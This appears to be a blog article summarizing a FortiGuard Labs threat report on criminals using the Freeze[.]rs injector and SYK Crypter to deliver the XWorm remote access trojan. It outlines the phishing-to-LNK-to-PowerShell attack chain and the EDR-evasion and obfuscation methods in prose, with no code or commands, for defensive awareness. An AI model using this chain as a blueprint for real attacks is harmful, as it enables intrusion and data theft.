![The Rise of Freeze[.]rs Injector in XWorm Malware Attacks](https://i0.wp.com/sanjayseth.com/wp-content/uploads/2023/08/pngegg-15.png?fit=958%2C873&ssl=1)
## Introduction
In recent months, cybersecurity researchers at FortiGuard Labs have uncovered a concerning trend in cyberattacks. Malicious actors have started utilizing a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments. This new attack chain, detected by Fortinet, demonstrates the rapid adoption of offensive tools by cybercriminals. In this article, we will provide an in-depth analysis of the Freeze[.]rs injector and its role in the propagation of the XWorm malware. We will also explore the attack chain, the obfuscation techniques employed, and the potential impact on targeted organizations.
The Freeze[.]rs Injector
Freeze[.]rs is an open-source red teaming tool developed by Optiv. Initially released as a payload creation tool, it enables the circumvention of security solutions and the execution of shellcode in a stealthy manner. The primary goal of Freeze[.]rs is to remove Userland EDR hooks and execute shellcode to bypass endpoint monitoring controls. This tool has gained popularity in the cybersecurity community due to its effectiveness in evading detection.
However, the rise of Freeze[.]rs as an offensive tool has also attracted the attention of malicious actors. These threat actors have weaponized Freeze[.]rs to deliver the XWorm malware, a remote access trojan with a wide range of malicious functionalities. This combination poses a significant threat to organizations, as it allows attackers to gain control over compromised devices and harvest sensitive data.
The XWorm Malware
XWorm is a commodity malware that has been observed in various cyberattacks. It is equipped with typical remote access trojan functionalities, including gathering machine information, capturing screenshots, logging keystrokes, and establishing control over compromised devices. The version of XWorm utilized in the Freeze[.]rs attacks is v3.1.
The XWorm payload is delivered to victim environments through a multi-layered attack chain, which we will explore in detail in the following sections. The primary targets of this malicious campaign are Europe and North America, as indicated by the C2 server’s traffic report.
The Attack Chain
The attack chain begins with a phishing email that contains a booby-trapped PDF file. This PDF file serves as the initial access point for the attackers. When the victim clicks on the PDF file, they are redirected to an HTML file hosted on a remote server. The HTML file utilizes the ‘search-ms’ protocol to access an LNK file, which is disguised as a benign PDF file icon.
Upon clicking the LNK file, a PowerShell script is executed, launching the Freeze[.]rs injector and a crypter known as SYK Crypter. These tools work in tandem to further the attackers’ offensive actions. The Freeze[.]rs injector, written in Rust, injects shellcode into the victim’s environment, while the SYK Crypter is responsible for obfuscating the malware and bypassing security measures.
The Role of SYK Crypter
SYK Crypter is a tool commonly used by threat actors to distribute various malware families, including AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT. It is delivered through a Discord content delivery network (CDN) disguised as benign purchase orders. SYK Crypter’s involvement in the Freeze[.]rs attacks adds an additional layer of obfuscation and complexity to the attack chain.
SYK Crypter employs polymorphism and string obfuscation techniques to evade detection by security solutions. It encodes the strings used in its execution flow and utilizes functions like “GetProcessesByName,” “Directory.Exists,” and “File.Exists” to assess the presence of security appliances within the compromised environment. These techniques make it challenging for security researchers to analyze and detect the malware.
The Rust Injector – Freeze[.]rs
The Freeze[.]rs injector, written in Rust, is the heart of the attack chain. It is responsible for injecting shellcode into the victim’s environment, allowing the subsequent execution of the XWorm malware. The shellcode is obtained through Base64 decoding and LZMA decompression. The injector then utilizes functions from the NTAPI library to inject the shellcode into the victim’s system.
The adoption of the Freeze[.]rs injector by malicious actors highlights the effectiveness of this tool in evading security solutions. The rapid adoption of Freeze[.]rs since its release in 2023 showcases the agility and adaptability of cybercriminals in utilizing new offensive tools.
Obfuscation Techniques
The attackers behind the Freeze[.]rs and XWorm malware attacks employ various obfuscation techniques to evade detection by security solutions. The shellcode within the Freeze[.]rs injector is encoded using Base64, and the file type and encryption algorithm can be selectively chosen within the program. This flexibility adds to the sophistication of the injector, making detection and analysis more challenging.
Additionally, SYK Crypter employs polymorphism and string obfuscation techniques to obfuscate its execution flow. The use of encoded strings and the assessment of security appliance presence further complicates detection and analysis for security researchers.
Impact on Targeted Organizations
The combination of the Freeze[.]rs injector and the XWorm malware poses a significant threat to targeted organizations. Once the XWorm malware is executed, attackers gain control over compromised devices, allowing them to harvest sensitive data, capture screenshots, log keystrokes, and establish persistence within the victim’s environment.
The primary targets of this malicious campaign are organizations in Europe and North America, as indicated by the C2 server’s traffic report. The potential impact on these organizations includes data breaches, financial losses, reputational damage, and disruption of normal business operations.
Conclusion
The rise of the Freeze[.]rs injector in the deployment of the XWorm malware highlights the agility and adaptability of cybercriminals in utilizing offensive tools. The combination of these tools poses a significant threat to organizations, as it allows attackers to gain control over compromised devices and harvest sensitive data. The multi-layered attack chain, obfuscation techniques, and primary targeting of organizations in Europe and North America make these attacks particularly concerning. To mitigate the risk, organizations should remain vigilant, employ robust security measures, and educate their employees about phishing and social engineering tactics.
Fortinet’s FortiGuard Labs continues to monitor and detect these attacks, providing essential protections against the Freeze[.]rs injector and XWorm malware. By staying informed and implementing proactive security measures, organizations can strengthen their defense against evolving cyber threats.
